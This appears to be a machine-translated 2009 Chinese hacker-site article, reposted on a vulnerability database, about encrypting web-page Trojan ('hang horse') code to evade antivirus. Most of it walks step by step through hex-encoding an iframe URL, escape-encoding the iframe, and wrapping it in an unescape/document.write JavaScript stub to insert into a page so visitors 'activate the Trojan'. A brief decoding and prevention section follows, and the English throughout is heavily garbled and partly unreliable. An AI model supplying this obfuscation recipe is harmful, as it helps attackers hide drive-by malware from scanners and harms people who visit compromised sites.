Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200922494
HistoryMar 13, 2009 - 12:00 a.m.

Analyze page Trojan how to encrypt code to evade kill-vulnerability warning-the black bar safety net

2009-03-1300:00:00
佚名
www.myhack58.com
8
JSON

As the web hang horse popular, the virus also began to keep tabs on various web hang horse way, this let many hackers very annoyed. But hackers soon found a coping method, this method iswill hang horse web page code to be encrypted, disrupting the original code looks like, let the antivirus software cannot identify. Don’t encrypt the web page after the Trojan is really not Guard? The answer is below. |

Swiss Star Tang Wei: senior security engineer on the network security aspect of the research is quite deep.
On hanging horse web pages to be encrypted is hackers often use means, such means to evade anti-virus software to kill, so in recent years hack in the web hang horse, usually will choose the ready-made web page code for secondary encryption even several times encrypted.
The early hackers the majority are only using a simple Unicode transcoding to achieve encryption, but using this encryption method web page soon to be antivirus software killing, can no longer effectively play thefree to killrole, so web page encryption also began the escalation of tricks, from Escape may convert the encoded encrypted to the escape character encryption, and finally to the development of the custom function to encrypt.

Security Encyclopedia: theEscapeis a present in JavaScript, VBS and other script languages in a function, in JavaScript, the Escape function plays let some non-English characters in the transfer process be re-encoded and then passed the role.

Web Trojan why you want to encrypt

Web Trojans all hate, anti-virus software to it is also very attention, also will take a variety of preventive means. Web Trojan to spread is limited, in order to better survive, in order not to be antivirus software and other security tools found, many hackers on the web page the Trojan is encrypted, adds antivirus Avira of difficulty, improve the web Trojan the survival rate. Therefore, the mainstream of web page Trojan are encrypted.

Web Trojan encryption types are many, the majority are using the web Code of each standard cross-conversion features, the encoding conversion encryption, this encryption scheme in a sense, just jamming out to rely on signatures to identify web pages Trojan virus identification, but did not themselves encrypted. Therefore, now more Advanced Encryption tools is the scripting language your function definition, then for the string encryption, and more manufacturing some antivirus chaotic threshold, which make them impossible to discern.

With a character conversion mode for encryption, just as we use English on a translation of the address the same, our computer is this fluent in many languages translations, we will remark telling this translation, this translation followed by the English language will these words copied down, and then again with a replacement password will be the period of the English to simple replacement, then the final of this period the English used Morse code to send to the other one can decrypt the translation.

Since the entire process using just the Basic code conversion, so any one know English will be in Morse code and understand English alternative password to unlock the password, but for not English or not a telegram, it is already very confusing things. In the following, we take the current hack of the most commonly used Escape encryption method, for example, the profile page Trojan encrypted mode and preventive methods.

Security gossip: in cryptography, the history, the most famous substitution cipher tool is the World War II the Germans used the code-named“Enigma”cipher machine, Enigma during World War II for the German army of the blitzkrieg and the German Navy’s“wolf Pack”submarine warfare provides the perfect communication security measures. In order to be able to decrypt the Enigma, the Allies in the UK dedicated to the establishment of deciphering center, and in the centre was born the world’s first computer, the 2 0 century’s greatest computer, the father of Alan Turing in cracking the Enigma of time has produced many modern computer prototype theory.

Web Trojan the encryption/decryption record

Tapping

First, the preparation need to encrypt the HTML code, where the choice of the following IFRAME frame hung it in the code:

<iframe src=http://soft. yesky. com width=4 0 0 height=3 0 0></iframe>

Then login conversion website http://tool. chinaz. com.

On the page find the“code conversion tools”, then click on the Select drop-down menu in the“URL16 hexadecimal encryption”item, after the Trojan web link address http://soft.yesky.com 输入 到 地址 栏 中 click the“encryption”after the http://%7 3%6F%6 6% 7 4%2%7 9% 6 5% 7 3%6B%7 9%2E%6 3%6F%6D/ (Figure 1).

! Profile page Trojan how to encrypt the escape hunt

Then, the encrypted URL and paste back to the original IFRAME code:

<iframe src= http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ width=4 0 0 height=3 0 0></iframe>

Then click on the“code conversion tools”in the menu“Encode encryption/decryption Tool”, the IFRAME code is copied to the input box, click“Encode encryption”, the encrypted code:%3Ciframe+src%3D+http%3A%2F%2F%2 5 7 3%256F%2 5 6 6% 2 5 7 4%252E%2 5 7 9% 2 5 6 5% 2 5 7 3%256B%2 5 7 9%252E%2 5 6 3%256F%256D%2F+width%3D400+height%3D300%3E%3C%2Fiframe%3E+
(Figure 2).

Then, open the WordPad program, the following code is entered into WordPad, and the encrypted code is copied to the specified location:

<SCRIPT LANGUAGE=“Javascript”><!–
var Words =“the encryption to generate the code after the copy here is OK!”
function OutWord()
{
var NewWords;
NewWords = unescape(Words)
document. write(NewWords);
}
OutWord();
// –>
</SCRIPT>

! Profile page Trojan how to encrypt the escape hunt

Finally, click on the“transcoding tool”menu in the“JS way encryption/decryption”, will modify the complete JavaScript code into the input box, and then click on the“JS encryption”, the complete code of the encryption process(Figure 3), and then the encrypted code into the you want to insert the Trojan in the web page. Later, when the user visits the site, it will activate the Trojan.

! Profile page Trojan how to encrypt the escape hunt

Proof

** **Security engineer across the encryption of the malicious Web page, the same into the conversion site, and then those complex paste code to decrypt the input box, then click on the“decrypt”button to solve for the original. However, note that since the decryption involves a different character encoding conversion between, and therefore in the decryption process be sure to grab a different encoding characteristics, such as Escape coding, usually with a“%”As at the beginning, when the Chinese converted to Escape after coding, is often a“%”followed by the lowercase letter“u”, the next is a 4-bit alphabet, which is the 1 6 hexadecimal characters.

General users to prevent the encryption of the malicious Web page, the best method is to open the antivirus software and the script in the filter function, or in IE“Internet Options”in the“Advanced”tab, select“Disable script debugging”. In addition, JS encryption and URL16 binary encrypted and sometimes in Firefox the browser will be automatically shielded, at browse your own suspect a dangerous web page, you can select the Firefox browser.

JSON